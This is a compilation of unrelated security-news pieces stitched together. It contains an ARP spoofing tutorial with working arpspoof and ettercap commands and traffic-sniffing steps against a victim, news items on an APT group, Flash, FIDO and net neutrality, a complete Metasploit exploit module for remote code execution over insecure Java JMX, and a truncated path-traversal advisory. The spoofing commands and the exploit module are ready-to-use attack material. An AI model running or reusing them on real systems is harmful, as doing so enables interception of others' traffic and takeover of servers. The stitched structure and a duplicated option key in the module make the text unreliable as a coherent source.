Aerosol

The Address Resolution Protocol (ARP) is used to resolve IP addresses into MAC addresses (hardware addresses). Computers in a network send messages to each other through MAC addresses. At an initial stage of communication, the computers are only aware of their allocated IP addresses on the network. The ARP plays the role of making an ARP request from the requesting device on the network by querying the IP addresses on a receiving device for a MAC address. The receiving network device replies with an ARP reply for further communication. More technically, ARP resolves from a network layer into a data-link layer of the OSI model. Resolving IP addresses to MAC with the ARP is similar to how the DNS helps resolve IP address to domain names. One major similarity they both have is that they need to do the resolving job on new network connections. In order to speed up the process and avoid a repetition, a cache is stored. There is usually a DNS cache, and with ARP there is an ARP cache stored on the ARP table. ARP spoofing is where an attacker pretends to be another computer on a network by telling the network gateway to request for the victim’s MAC address from his/her machine IP address. The same process is repeated vice versa with the victim, making the victim see the attacker’s IP address as the gateway address ARP replies. The image below illustrates a typical ARP operation: This image is the same as the process above but with an attacker in the picture: At this point of interception, the attacker receives every piece of data meant for the victim from the gateway and vice versa. A default result will be disrupted communication between the victim and the gateway. Packets meant for the victim wouldn’t get to him, and the victim may get suspicious. To prevent this, the attacker forwards packets from the gateway to the victim and does the same thing back to the gateway. Bringing all that to reality! From a Windows machine, running an arp -a command will list a cache of all neighbour IP addresses with their MAC addresses. This works across Mac and Linux the same way, but our victim machine here is Windows. While we can see that the IP address 192.168.1.1 resolves into the d4:ca:6d:fc:43:9f hardware address, the attacker will begin an ARP proxy (spoof) against this address. The ARP cache on the victim PC as seen above consists of dynamic and static entries. To monitor how the victim’s machine is communicating with the gateway, I’ll run a continuous ping from the victim machine to the gateway device with the Windows ping -t command. During this test, the following IP addresses are used: 192.168.216.2 ? Gateway device 192.168.216.129 ? Victim address 192.168.216.130 ? Attacker address The continuous response from the continuous ping means there is a proper connection between the victim PC and the default gateway. Since ARP replies contain MAC address replies from a network device, the attacker’s objective is to flood ARP replies to both the target and the remote host. To achieve this, the arpspoof command line utility is used on a Linux box. The -i switch is used the specify the network interface, -t is for target host, and -r for remote host. Remote host pretends to be the one to be sending the ARP replies, and Target host is the host that receives the reply. arpspoof -i eth0 -t 192.168.216.2 192.168.216.129 The process is repeated inversely to have a bi-directional packet traffic redirection. arpspoof -i eth0 -t 192.168.216.129 192.168.216.2 At this point, the communication between the victim machine and the gateway is lost. We had created a ping to the gateway earlier from the victim machine. Requests being made are now timed out. The attacker enables IP forwarding to allow packets flow from both proxied network devices. That brings back a network communication with a Man-In-The-Middle of the victim and the gateway host. The victim now has a poisoned ARP cache From the figure above it appears that both IP addresses 192.168.216.2 and 192.168.216.130 resolve into the hardware address 00-0C-29-81-19-63 as dynamic entries. Ettercap can also be used to achieve what we have done with arpspoof, but it’s far less painful to do with arpspoof. To use ettercap we would have had to run: ettercap -i interface -Tq -M arp:remote /192.168.216.2/ /192.168.216.129/ ARP Cache Poisoning ARP cache poisoning involves poisoning the cache of a victim user by flooding it with ARP replies containing MAC addresses to a proxy host. This is what has been achieved in the last step above. ARP spoofing is a technique to achieve ARP cache poisoning. At this point, any kind of network interceptions can be done. You could view images from the victim’s browser by using driftnet, grab mails with mailsnarf, URLs with urlsnarf, IM messages with msgsnarf, sniff files from NFS traffic with filesnarf, and intercept packets with wireshark or ettercap. While I had driftnet active on the attacker machine, I opened the contributors page here at InfoSec Institute and got the following: Just to be a more prying attacker, I had a tmux session with mailsnarf, msgsnarf, and urlsnarf monitoring on 3 panes. I won’t show what the end results of those were, as I’d be putting my privacy in jeopardy by doing so. Okay, I will be nice enough to show results from urlsnarf and dsniff: While urlsnarf was grabbing the URLs, I also kept dnsiff monitoring the victim, and there was an FTP authentication attempt that prompted this: Also, the dsniff suite provides more MITM tools including sshmitm, webmitm, and webspy. An old way to achieve something similar but not quite specific enough is to use another tool from the dsniff suite called macof, and oh! I didn’t mention arpspoof is also from the dsniff suite. Macof floods switched LAN ports with random MAC addresses. That looks too noisy, and since it just starts flooding, I only take it for an option when I’m considering ARP spoofing as a Denial-Of-Service asset. ARP spoofing attacks would be impossible if there was an authentication mechanism for ARP replies. Mitigating ARP spoof attacks Prevent duplicate MAC: This can be achieved by using a good Intrusion Detection System (IDS). It can be set to detect large ARP traffics, duplicate MAC, and MAC floods. Taking a closer look at figure 9, there are two IP address entries with same MAC 00-0C-29-81-19-63 which is something to be prevented. Keep track of ethernet/IP address pairings. Arpwatch tool or ArpSNMP comes really handy when trying to use this. It is a Unix utility. Use static ARP entries. As seen above, the affected entries in the victim ARP cache were dynamic entries. Arpwatch and Arpsnmp have been mentioned earlier. Another good tool for a preventive measure on ARP attacks is Arpon. Before discussing arpon further, I will also like to discuss the arping tool. Arping works just like the ping command line utility. Unlike the ping, which checks if hosts are reachable by their domain names or IP addresses and then resolves domain names into IP addresses, the arping resolves pinged IP addresses into MAC addresses and also allows pinging MAC addresses directly with an interface specified with the -i switch. ARPON is a ARP handler inspection tool that secures the ARP. It uses two techniques to achieve this. The SARPI (Static ARP Inspection) and the DARPI (Dynamic ARP inspection). The two techniques protect against both distributed attacks and bi-directional attacks as we have demonstrated with macof and arpspoof. To properly use the bi-directional protection of Arpon, it should be installed on both network devices including the target and remote host, which are our victim machine and the default gateway. For the distributed attack prevention, Arpon should be installed on all machines in the LAN. Arpon has a daemon that runs from boot when installed on a computer. It helps fight against ARP poisoning attacks with the SARPI and DARPI by blocking them, while tools like Arpwatch and Arpsnmp will just point out the attack presence. Conclusion ARP attacks seen involved taking advantage of the fact that the ARP protocol resolves addresses from the network layer of the OSI model to the data-link layer without any form of authentication. By sending excess ARP replies, an attacker can fool a target machine that he can be addressed by the hardware address of another machine in the network. One major way to prevent this is to avoid MAC duplication in the ARP cache. Various tools were mentioned for mitigation but Arpon seems to be the most powerful tool presently. A future with IPv6 may help put an end to attacks like this. Source

A cyber mercenary group, codenamed Desert Falcons, has infected thousands of government departments and businesses with malware, according to Kaspersky Lab. The security firm revealed the campaign at its Security Analyst Summit, revealing that it has already detected 3,000 confirmed Desert Falcons infections on Android and Windows devices. Victims include military and government bodies, media outlets, financial firms, research institutions, political activists, energy companies and physical security providers in Egypt, Palestine, Israel and Jordan. "The Desert Falcons cyber criminals are native Arabic speakers, and it is believed to be the first known Arab group to develop and run a full cyber espionage operation," read the report. "Desert Falcons began its operations in 2011, with the first infections taking place in 2013. The group became very active in late 2014/early 2015." The group is believed to have around 30 members split into three teams, and focuses mainly on stealing political and military intelligence. Kaspersky estimated that the hackers managed to steal more than one million files and documents containing sensitive information before being discovered. Dmitry Bestuzhev, security expert at Kaspersky Lab's Great team, said the Desert Falcons target victims with tailored campaigns which include a prolonged period of surveillance. "The individuals behind this threat are highly determined, active and with good technical, political and cultural insight," he explained. "Using only phishing emails, social engineering and homemade tools and backdoors, Desert Falcons was able to infect hundreds of sensitive and important victims." The campaign used a variety of malware types, and is one of the first to attempt to spread malware using Facebook chat. "The attackers created authentic Facebook accounts and then interacted with chosen victims through common Facebook pages until they had gained their trust. Then they sent Trojan files in the chat hidden as an image or similar," read the paper. "The Desert Falcons depends on two different backdoors to spy on victims. Both are homemade and are under continuous development. We were able to identify and collect more than 100 malware samples used by the Desert Falcons." The selection of tools gives the hackers a variety of powers, including key-logging and the ability to upload and download files to command and control servers owned by the group. Other powers include the ability to view information on all the .doc and .xls files on the victim's hard disk or connected USB devices, steal passwords and record audio files using infected machines. Kaspersky has managed to identify some Desert Falcon members, but expects the group to continue operating. "We were able to track and identify the full profile of some of the attackers, including Facebook and Twitter accounts, private blogs and websites," read the paper. "[but] we expect their operations to carry on developing more trojans and using more advanced techniques." Desert Falcons was one of many high-profile threat campaigns revealed during Kaspersky's security conference. Kaspersky researchers reported on Tuesday that they had uncovered a widespread Equation attack infecting hard drive operating systems with malware. The team also reported a Carbanak campaign which is believed to have stolen over $1bn from financial institutions. Source

Open source SWF player promises alternative to Adobe's endless security horror In November 2012 the Mozilla Foundation announced “Project Shumway”, an effort to create a “web-native runtime implementation of the SWF file format.” Two-and-a-bit years, and a colossal number of Flash bugs later, Shumway has achieved an important milestone by appearing in a Firefox nightly, a step that suggests it's getting closer to inclusion in the browser. Shumway's been available as a plugin for some time, and appears entirely capable of handling the SWF files. Few average users know of Shumway's existence, never mind seek it out. So the inclusion of the software in Firefox's nightlies will give it greater exposure. For now the code can only play certain videos hosted on Amazon.com, but developers intend to expand the list of sites from which Shumway will play SWF files. For now, Shumway-in-Firefox-nightlies works only on Windows Vista or later versions of Windows, and OSX. But expanded support is promised. When it arrives in a full version of Firefox, it will mean that about 15.1 per cent of all web surfing won't need Flash (based on W3counter market share data). Flash is a security nightmare that we recently suggested deserves to rot in an unmarked grave. Mozilla looks to be giving it a welcome shove in just that direction. Source

MICROSOFT HAS REVEALED that the forthcoming Windows 10 operating system, which is currently in live public beta, will support the Fast Identification Online (Fido) security standard. The Fido Version 1 standard became final in January and is already in use by companies such as Yubico in creating a Universal Second Factor that works across sites using USB or near-field communication, along with fingertip impulses to trigger it. The adoption of Fido in Windows 10 will allow users to lock down machines, rendering them useless to anyone without a Fido authentication device. This could take the form of USB stick, a biometric or a myriad other forms, some of which are yet to be thought of. Stina Ehrensvard, CEO and founder of Yubico, told The INQUIRER: "Yubico shares the same mission as the Fido Alliance; to make secure log-in easy and affordable for everyone, and enable one single authentication device to access any number of applications. "Fido open standards specifications were published only a few months ago, resulting in a thriving ecosystem of chip, device, service, open source and enterprise software providers. The announcement of Fido support in Windows 10 is an important milestone for realising our mission." Fido was developed in part by Google, and the system is already in place to provide protection to Google accounts. Version 2.0 will be the one that arrives with Windows 10, with further input from Microsoft into the refinements. Scott Charney, Microsoft's go-to guy for Trustworthy Computing, said at a White House Cybersecurity and Consumer Protection Summit at Stanford University that "shaping a cyber-savvy workforce and moving beyond passwords in partnership with the private sector" is one of the company's top priorities. That, and Judge Dredd helmets. Fido is already up and running through Bank of America, PayPal and Microsoft sites, and is designed as a fully open standard so that anyone can add the tech to their website credentials. A Microsoft blog post confirms that the company will work with all Windows sign-in scenarios including software as a service provided by Azure active directory. µ Can we move away from passwords? Is having an open system like Fido the answer, or should we be creating bespoke solutions? How do you feel about putting all your credentials against one biometric? Let us know below. *This is the stupidest idea for a password ever. Don't use it. Source

The chairman of the Federal Communications Commission announced recently he would seek to reclassify broadband Internet as a common carrier service so the government could enforce net neutrality rules, something that President Obama supports. Some telecom executives and Republicans in Congress are calling this an “extreme” and “backwards” proposal, and they’re investigating the President’s role in pushing for it. But we’ve only reached this pivotal moment in the net neutrality debate because of past efforts by corporate lobbyists and their political allies to weaken the government’s ability to protect the open Internet. Without the telecommunications industry’s massive power to design policies in its favor, the government would most likely already have the authority it needs to ensure net neutrality. In the early 2000s, back when Gmail was still for Garfield fans only, policymakers were facing important questions about the nature of broadband Internet and how it should be treated by regulators. The last major telecommunications bill was passed by Congress in 1996 and since then the technology had advanced rapidly, with two different services, cable Internet and digital subscriber line (DSL), becoming widely available. These services both operated on infrastructure that was originally built for other purposes (cable television and landline telephony, respectively), and since the 1996 bill didn’t address Internet service in a substantial way, regulators had simply applied the regulatory treatment traditionally associated with the infrastructures to the new Internet services being offered on them. That meant that cable Internet, carried over lines used to transmit television, was treated like an “information service,” while DSL, carried over copper telephone wires, was treated like a “telecommunications service.” The distinction is critical because under the 1996 law telecommunications services— things like wireline telephone service—are regulated more heavily under Title II of the law while information services—things like television channels and websites—are more lightly regulated under the Federal Communication Commission’s ancillary authority originating in Title I. Cable systems also face cable-specific rules from Title VI, which was added to communications law in 1984. Title II was designed by Congress in 1934 to prevent the companies that provide basic communications services from engaging in anticompetitive and discriminatory practices. It treats these services as “common carriers”—essentially private utilities that have to meet certain public benefit, openness, and non-discrimination requirements in exchange for owning and operating monopolies. At the time of its creation this applied primarily to telephone companies, but the requirements of the law are also well suited to preventing internet service providers from violating net neutrality principles. To consumers, cable and DSL ISPs were offering nearly identical services, but because of the outdated laws they were being treated very differently by regulators. In order to achieve regulatory parity, regulators had to decide if broadband service was more like a cable television channel or more like landline telephone service. In other words, they had to choose between regulating cable Internet up to Title II or deregulating DSL Internet service down to its general Title I authority. The Baby Bells In 2000 the DSL industry was dominated by the four remaining companies from the breakup of the old AT&T monopoly—Verizon, BellSouth, SBC Communications, and Qwest. These companies, commonly referred to as the “Baby Bells,” still operated regional monopolies and therefore were required under the 1996 bill to allow other carriers to access their networks. Because of this requirement, a new and growing industry of startup ISPs (competitive local exchange carriers, or CLECs) had begun leasing copper-line infrastructure from the Bells and offering competing broadband service to customers on their lines. Not surprisingly, as the Baby Bells rolled out their DSL service, they saw the cable industry’s more relaxed regulations and total lack of competition and wanted the same treatment from the government. They launched a massive lobbying effort to push the Clinton and Bush administrations, the Federal Communication Commission, and Congress to eliminate the network sharing requirement that had spawned the CLEC market and to deregulate DSL services more broadly. Between 1999 and 2002 the four companies spent a combined $95.6 million on lobbying the federal government, according to data from the Center for Responsive Politics, which would rank them above such trade group lobbying behemoths as the Chamber of Commerce and the American Medical Association in total lobbying expenditures for the years. The companies also spent millions to lobby the public directly through aggressive advertising and public relations campaigns. Their basic strategy was to push a bargain that if DSL was reclassified and they were allowed to operate regional monopolies without having to follow common carrier rules, they would voluntarily increase their investments in infrastructure and speed up the deployment of broadband in underserved areas. One of the Baby Bells’ closest allies in Congress at the time was Louisiana Democrat-turned-Republican Rep. Billy Tauzin, who in 2001 had become the Chairman of the Energy and Commerce Committee, which oversees telecommunications issues and the Federal Communications Commission. The four companies had given hundreds of thousands to Tauzin’s electoral campaigns over the years. In the 2000 election, Verizon was Tauzin’s largest single donor ($13,750) and SBC was his fourth largest ($10,000). In the 2002 election the Baby Bells gave more than $61,300 to Tauzin’s campaign committee and leadership PAC, making him the top congressional recipient of their political spending for that cycle. They also helped pay for a $400,000 Mardi Gras-themed fundraiser for Tauzin at the 2000 Republican National Convention. Tauzin’s son was employed at the time as a lobbyist for one of the Baby Bells, BellSouth, in Louisiana. (For more information on Tauzin’s deep relationship with the Bell companies, check out this article originally published at Interactive Weekly). In 2001 Tauzin teamed up with Democratic Rep. John Dingell, himself a top recipient of Baby Bell largesse, to sponsor legislation that would give the companies pretty much everything they had been lobbying for. Their bill, the “Internet Deployment and Broadband Freedom Act,” known more commonly as “Tauzin-Dingell,” would exempt Verizon and the Baby Bells from having to share their networks with competitive start-up carriers as required by the 1996 bill. The bill also proposed to add a new section to Title II of the Communications Act to broadly exempt broadband Internet, regardless of the carrier technology, from a wide swath of the regulatory powers held by the FCC and the states. “Neither the [Federal Communications] Commission, nor any State, shall have authority to regulate the rates, charges, terms, or conditions for, or entry into the provision of, any high speed data service, Internet backbone service, or Internet access service,” the bill text read in part. On February 27, 2002, Tauzin’s bill was brought to the floor of the House and passed by a vote of 273-157. Both Democrats and Republicans were divided on the bill, but it still won support from a majority of both parties. More than party affiliation, campaign contributions from Verizon and the Baby Bells were a better predictor of how members would vote, a fact that suggests the companies had a powerful influence over policymakers as they debated the future of broadband regulation. According to an analysis by the Center for Responsive Politics, the representatives who voted in favor of Tauzin-Dingell received, on average, 2.9 times more money from Verizon and the Baby Bells in the form of campaign contributions in the 2002 election than did the Representatives who voted against it. The cable industry was officially indifferent to Tauzin-Dingell, despite the fact that it benefited its chief competitor industry, because they recognized that it favored a “regulate down” approach and, if enacted, could put them in a better position for avoiding new regulations on their own services. “NCTA strongly believes that marketplace competition is the best way to foster the availability of broadband services to all Americans,” the National Cable & Telecommunications Association (NCTA) said in a statement. “Thus, we have not opposed the Tauzin-Dingell bill nor advocated that regulatory conditions be placed on broadband competitors." Tauzin’s friend Powell At the same time that the House was voting on the Tauzin-Dingell bill, the Federal Communications Commission was considering separately what they could do through rulemaking to achieve regulatory parity between cable and DSL. In 2000 the FCC launched a rulemaking proceeding to determine how to classify and regulate cable internet service. In 2002 they opened a similar proceeding for DSL that sought to “resolve outstanding issues regarding the classification of telephone-based broadband Internet access services and the regulatory implications of that classification.” Beginning in 2001, the Federal Communications Commission was chaired by Michael Powell, the son of Colin Powell and a former attorney for GTE Corp., the company that would form Verizon after merging with Bell Atlantic in 2000. Powell, in many ways, owes his position on the FCC to none other than Rep. Billy Tauzin. Back in 1997, Tauzin lobbied to get Powell appointed to the commission over incumbent Rachelle Chong, who was seeking a second term. Then, in 2001, Tauzin led the charge to get President Bush to elevate Powell to the chairmanship over Pat Wood III, who, until Tauzin got involved, was widely expected to take the position. As recounted by Village Voice reporter Brendan Koerner, Tauzin “engineered” Powell’s accession to the chairmanship as one of his first Bush-era acts. To recap: Powell, a former attorney for Verizon, was hand-picked to lead the FCC by the head of the congressional committee with oversight over the commission, Billy Tauzin, and immediately faced major decisions on the regulatory classification of the Internet, an issue that Tauzin had spent years working on and that directly impacted the bottom line of his biggest donors. Powell seems to have received the message that Billy Tauzin and the House of Representatives sent when they voted to gut Title II as it applies to the Internet. On Feb. 14, 2002, just two weeks after the House passed the Tauzin-Dingell bill, the Powell-led FCC took an unusual step that set in motion their approach to regulatory parity for cable and DSL. The Commission leapfrogged the typical public comment period and “notice of proposed rulemaking” and issued a declaratory ruling that cable Internet was properly classified as an information service, and thus not subject to common carrier rules, including line sharing requirements and nondiscrimination protections. One month later they released a rule proposal that tentatively concluded that DSL would also be reclassified as a Title I information service. The DSL reclassification was finalized in 2005. It’s unclear what kinds of discussions Billy Tauzin was having with Powell around the FCC’s decisions to classify broadband as a Title I information service, but watchdog groups were accusing him of “meddling” in related rulemaking proceedings at the agency around the same time. Later accounts of Tauzin’s involvement in health care legislation as a lobbyist for the pharmaceutical industry suggest that he can be aggressive at lobbying policymakers to bend his way. With the FCC’s rulings, broadband Internet service was officially differentiated from dial-up Internet service for regulatory purposes and reclassified to the same category of lightly regulated information services as things like websites or apps. The Powell-led FCC had finalized nearly all of the broadband deregulation that the Baby Bells had lobbied for and that Rep. Tauzin and Baby Bell-backed representatives had endorsed, but without having to go through Congress and change the law. These rulings led to the elimination of line-sharing requirements and decimated the CLEC industry that had been competing with the local monopolies for residential broadband customers. Years later Verizon and Comcast would use the rulings to kill the FCC’s attempts at enforcing net neutrality. In 2010, the DC Circuit Court of Appeals ruled in favor of Comcast in determining that the FCC did not have “reasonably ancillary” jurisdiction to use Title I of the Communication Act to stop Comcast from throttling peer-to-peer programs because they could not cite a statutorily mandated responsibility empowering them to do so. In 2014 the DC Circuit cited the Title I classification of ISPs in siding with Verizon and vacating the FCC’s second attempt at promulgating net neutrality rules. “Given that the Commission has chosen to classify broadband providers in a manner that exempts them from treatment as common carriers, the Communications Act expressly prohibits the Commission from nonetheless regulating them as such,” the court stated. Michael Powell left the FCC in 2005, but he is still one of the most powerful figures in determining Internet regulations and net neutrality rules. Powell is now the president and chief lobbyist of the NCTA, a cable industry trade group that has been the hands-down leader in the industry’s efforts to block net neutrality. Under Powell, the organization has increased its spending on lobbying year after year and it now spends more on lobbying than any other organization in the communications sector. With Powell at the helm working his connections in Congress and at the FCC, they seemed to be getting maximum bang for the buck because so-called revolving door connections make lobbying spending more effective—until current FCC Chairman and former NCTA chief Tom Wheeler announced that he would propose to reclassify broadband as Obama suggested. Although it looks like as though the FCC is about to reclassify broadband as Title II, many of the same factors that led to the deregulatory rulings of the early 2000s are still in play. Members of Congress, disproportionately those who are financially supported by large cable and telecom companies, are lobbying against Title II reclassification. The broadband industry is now more consolidated than ever and the industry’s promise of infrastructure investment in exchange for deregulation has not come to pass. The companies that provide Internet service to most Americans have not always been deregulated monopolies with the ability to create fast lanes and slow lanes on the Internet. They got there by using many of the tactics that have fueled the record levels of distrust in the U.S. government—bought politicians, corrupt legislation, and revolving-door power trading. While it’s not possible to examine the counterfactual history in which policymakers designed regulatory parity for the Internet with total independence, it should be acknowledged that the current net neutrality debate is based on past policy decisions, including the original removal of broadband from Title II, that were shaped by lobbying dollars and the raw monopoly power of America’s top telecommunications companies. Donny Shaw is a freelance journalist covering money in politics, tech, monopoly power and the legislative process. Source

Reflected File Download RFD is a web attack vector that enables attackers to gain complete control over a victims machine by virtually downloading a file from a trusted domain. Read more: http://dl.packetstormsecurity.net/papers/presentations/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf

Samhain is a file system integrity checker that can be used as a client/server application for centralized monitoring of networked hosts. Databases and configuration files can be stored on the server. Databases, logs, and config files can be signed for tamper resistance. In addition to forwarding reports to the log server via authenticated TCP/IP connections, several other logging facilities (e-mail, console, and syslog) are available. Tested on Linux, AIX, HP-UX, Unixware, Sun and Solaris. Changes: Added non-existent file to the regression test config. Multiple bug fixes. Link download: here Link project: Samhain Labs | samhain

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Java::Jmx include Msf::Exploit::Remote::HttpServer include Msf::Java::Rmi::Client def initialize(info = {}) super(update_info(info, 'Name' => 'Java JMX Server Insecure Configuration Java Code Execution', 'Description' => %q{ This module takes advantage a Java JMX interface insecure configuration, which would allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while interfaces with authentication enabled will be vulnerable only if a weak configuration is deployed (allowing to use javax.management.loading.MLet, having a security manager allowing to load a ClassLoader MBean, etc.). }, 'Author' => [ 'Braden Thomas', # Attack vector discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf'], ['URL', 'http://www.accuvant.com/blog/exploiting-jmx-rmi'] ], 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Privileged' => false, 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Stance' => Msf::Exploit::Stance::Aggressive, 'DefaultOptions' => { 'WfsDelay' => 10 }, 'Targets' => [ [ 'Generic (Java Payload)', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'May 22 2013' )) register_options([ Opt::RPORT(1617) ], self.class) end def on_request_uri(cli, request) if request.uri =~ /mlet$/ jar = "#{rand_text_alpha(8 + rand(8))}.jar" mlet = "<HTML><mlet code=\"metasploit.JMXPayload\" " mlet << "archive=\"#{jar}\" " mlet << "name=\"#{@mlet}:name=jmxpayload,id=1\" " mlet << "codebase=\"#{get_uri}\"></mlet></HTML>" send_response(cli, mlet, { 'Content-Type' => 'application/octet-stream', 'Pragma' => 'no-cache' }) print_status("Replied to request for mlet") elsif request.uri =~ /\.jar$/i p = regenerate_payload(cli) jar = p.encoded_jar paths = [ ["metasploit", "JMXPayloadMBean.class"], ["metasploit", "JMXPayload.class"], ] jar.add_files(paths, [ Msf::Config.data_directory, "java" ]) send_response(cli, jar.pack, { 'Content-Type' => 'application/java-archive', 'Pragma' => 'no-cache' }) print_status("Replied to request for payload JAR") end end def check connect unless is_rmi? return Exploit::CheckCode::Safe end mbean_server = discover_endpoint disconnect if mbean_server.nil? return Exploit::CheckCode::Safe end connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] }) unless is_rmi? return Exploit::CheckCode::Unknown end jmx_endpoint = handshake(mbean_server) disconnect if jmx_endpoint.nil? return Exploit::CheckCode::Detected end Exploit::CheckCode::Appears end def exploit @mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}" connect print_status("#{peer} - Sending RMI Header...") unless is_rmi? fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol") end print_status("#{peer} - Discoverig the JMXRMI endpoint...") mbean_server = discover_endpoint disconnect if mbean_server.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint") else print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}") end connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] }) unless is_rmi? fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server") end print_status("#{peer} - Proceeding with handshake...") jmx_endpoint = handshake(mbean_server) if jmx_endpoint.nil? fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server") else print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}") end print_status("#{peer} - Loading payload...") unless load_payload(jmx_endpoint) fail_with(Failure::Unknown, "#{peer} - Failed to load the payload") end print_status("#{peer} - Executing payload...") invoke_run_stream = invoke_stream( obj_id: jmx_endpoint[:id].chop, object: "#{@mlet}:name=jmxpayload,id=1", method: 'run' ) send_call(call_data: invoke_run_stream) disconnect end def is_rmi? send_header ack = recv_protocol_ack if ack.nil? return false end true end def discover_endpoint send_call(call_data: discovery_stream) return_data = recv_return if return_data.nil? vprint_error("#{peer} - Discovery request didn't answer") return nil end answer = extract_object(return_data, 1) if answer.nil? vprint_error("#{peer} - Unexpected JMXRMI discovery answer") return nil end case answer when 'javax.management.remote.rmi.RMIServerImpl_Stub' mbean_server = extract_unicast_ref(StringIO.new(return_data.contents[2].contents)) else vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{answer}") return nil end mbean_server end def handshake(mbean) vprint_status("#{peer} - Sending handshake / authentication...") send_call(call_data: handshake_stream(mbean[:id].chop)) return_data = recv_return if return_data.nil? vprint_error("#{peer} - Failed to send handshake") return nil end answer = extract_object(return_data, 1) if answer.nil? vprint_error("#{peer} - Unexpected handshake answer") return nil end case answer when 'java.lang.SecurityException' vprint_error("#{peer} - JMX end point requires authentication, but it failed") return nil when 'javax.management.remote.rmi.RMIConnectionImpl_Stub' vprint_good("#{peer} - Handshake completed, proceeding...") conn_stub = extract_unicast_ref(StringIO.new(return_data.contents[2].contents)) else vprint_error("#{peer} - Handshake returned unexpected object #{answer}") return nil end conn_stub end def load_payload(conn_stub) vprint_status("#{peer} - Getting JMXPayload instance...") get_payload_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: "#{@mlet}:name=jmxpayload,id=1") send_call(call_data: get_payload_instance) return_data = recv_return if return_data.nil? vprint_error("#{peer} - The request to getObjectInstance failed") return false end answer = extract_object(return_data, 1) if answer.nil? vprint_error("#{peer} - Unexpected getObjectInstance answer") return false end case answer when 'javax.management.InstanceNotFoundException' vprint_warning("#{peer} - JMXPayload instance not found, trying to load") return load_payload_from_url(conn_stub) when 'javax.management.ObjectInstance' vprint_good("#{peer} - JMXPayload instance found, using it") return true else vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}") return false end end def load_payload_from_url(conn_stub) vprint_status("Starting service...") start_service vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...") create_mbean = create_mbean_stream(obj_id: conn_stub[:id].chop, name: 'javax.management.loading.MLet') send_call(call_data: create_mbean) return_data = recv_return if return_data.nil? vprint_error("#{peer} - The request to createMBean failed") return false end answer = extract_object(return_data, 1) if answer.nil? vprint_error("#{peer} - Unexpected createMBean answer") return false end case answer when 'javax.management.InstanceAlreadyExistsException' vprint_good("#{peer} - javax.management.loading.MLet already exists") when 'javax.management.ObjectInstance' vprint_good("#{peer} - javax.management.loading.MLet created") when 'java.lang.SecurityException' vprint_error("#{peer} - The provided user hasn't enough privileges") return false else vprint_error("#{peer} - createMBean returned unexpected object #{answer}") return false end vprint_status("#{peer} - Getting javax.management.loading.MLet instance...") get_mlet_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: 'DefaultDomain:type=MLet') send_call(call_data: get_mlet_instance) return_data = recv_return if return_data.nil? vprint_error("#{peer} - The request to getObjectInstance failed") return false end answer = extract_object(return_data, 1) if answer.nil? vprint_error("#{peer} - Unexpected getObjectInstance answer") return false end case answer when 'javax.management.InstanceAlreadyExistsException' vprint_good("#{peer} - javax.management.loading.MLet already found") when 'javax.management.ObjectInstance' vprint_good("#{peer} - javax.management.loading.MLet instance created") else vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}") return false end vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...") invoke_mlet_get_mbean_from_url = invoke_stream( obj_id: conn_stub[:id].chop, object: 'DefaultDomain:type=MLet', method: 'getMBeansFromURL', args: { 'java.lang.String' => "#{get_uri}/mlet" } ) send_call(call_data: invoke_mlet_get_mbean_from_url) return_data = recv_return vprint_status("Stopping service...") stop_service if return_data.nil? vprint_error("#{peer} - The call to getMBeansFromURL failed") return false end answer = extract_object(return_data, 3) if answer.nil? vprint_error("#{peer} - Unexpected getMBeansFromURL answer") return false end case answer when 'javax.management.InstanceAlreadyExistsException' vprint_good("#{peer} - The remote payload was already loaded... okey, using it!") return true when 'javax.management.ObjectInstance' vprint_good("#{peer} - The remote payload has been loaded!") return true else vprint_error("#{peer} - getMBeansFromURL returned unexpected object #{answer}") return false end end end Source

Document Title: =============== ES File Explorer v3.2.4.1 - Path Traversal Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1435 CVE-ID: ======= CVE-2015-1876 Release Date: ============= 2015-02-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1435 Common Vulnerability Scoring System: ==================================== 7.8 Product & Service Introduction: =============================== ES File Explorer is a free all-in-one including a file manager & application & tasks, support for online storage spaces (Dropbox, Google Drive, SkyDrive, Box.net, Sugarsync, Yandex, Amazon S3), FTP & Samba client to explore the images, music, videos, documents and other files from your phone and your computer. It allows Android users around the world to manage their resources for free; you can see the files on your phone, access from anywhere and share them with others; it allows you to easily manage your photos or watch videos, stay connected on 3G, EDGE or WiFi, and share with friends. (Copy of the Vendor Homepage: https://play.google.com/store/apps/details?id=com.estrongs.android.pop ) Abstract Advisory Information: ============================== An independent vulnerability laboraotory researcher discovered a path traversal web vulnerability in the official ES File Explorer v3.2.4.1 mobile android web-application. Vulnerability Disclosure Timeline: ================================== 2015-02-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== ES APP GROUP Product: ES File Explorer - Mobile Web Application (Android) 3.2.4.1 Exploitation 